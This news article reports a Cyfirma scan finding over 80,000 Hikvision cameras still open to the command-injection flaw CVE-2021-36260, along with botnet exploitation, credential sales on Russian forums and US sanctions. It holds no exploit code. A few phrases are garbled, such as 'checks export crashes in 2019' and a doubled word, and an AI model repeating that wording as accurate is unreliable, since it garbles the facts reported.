Vulnerable Hikvision cameras exposed online

Cyfirma finds 80,000 unpatched Chinese-made cameras in online scan

Brian Pereira (digital_belief) •
August 23, 2022

Hikvision headquarters in Hangzhou, Zhejiang, China. (Image: Raysonho @ Open Grid Scheduler / Grid Engine)

Cybercriminals in Russian forums are selling login credentials to Hikvision-branded security cameras, tens of thousands of which remain vulnerable to a well-known exploit, a threat intelligence firm warns.

A A study by Cyfirma reveals that more than 80,000 Hikvision cameras in use worldwide contain a critical flaw first identified more than a year ago.

See also: Webinar | Prevent, Detect and Restore: Data Security Backup Systems Simplified

Chinese manufacturer Hangzhou Hikvision Digital Technology Co. released a patch for the vulnerability last September. Tracked as CVE-2021-36260, this command injection vulnerability allows attackers to execute arbitrary system commands on the victim’s host operating system. Attackers could exploit the vulnerability to add the cameras to a botnet or as a launching point for lateral movement deeper into the camera operator’s network. Late last year, cybersecurity firm Fortinet said it spotted “numerous payloads attempting to exploit this vulnerability,” including one that appeared to recruit vulnerable cameras into the Moobot botnet, a variant of the Mirai botnet.

Cyfirma researchers analyzed a sample of approximately 285,000 Hikvision web servers worldwide. He revealed that more than 2,300 organizations in over 100 countries use cameras with open web ports. Nearly a third of the vulnerable cameras were in China and the United States, with each country responsible for 12,690 and 10,611 vulnerable devices, respectively.

Saurabh Lal, president of research and customer engagement at Cyfirma, told Information Security Media Group that these organizations are likely unaware of the device’s openness to online traffic.

“These ports aren’t monitored, validated, or tested, and they just add entry points to your porous attack surface,” says Lal. He says it’s an “implementation flaw” and that the companies have been “careless with the setup.”

In January 2022, the US Cybersecurity and Infrastructure Security Agency warned that the vulnerability was being actively exploited and urged organizations to fix immediately.

Cyfirma believes that Chinese threat groups such as MISSION2025/APT41, APT10 and its affiliates, as well as unknown Russian threat actor groups could potentially exploit unpatched security cameras.

“We observed leaking credentials of Hikvision camera products available for sale on Russian forums,” Cyfirma researchers say.

Hikvision is controlled by the Chinese government and is on several US federal government blacklists. The Federal Communications Commission in March 2021 classified the company as a national security risk. U.S. citizens are barred from owning shares of the company under an executive order first signed by Donald Trump and revised by President Joe Biden in June 2021. The Department of Commerce has subjected the company to checks export crashes in 2019 for participating in state surveillance of the Uyghur ethnic group in the Xinjiang Uyghur Autonomous Region.

Comments are closed.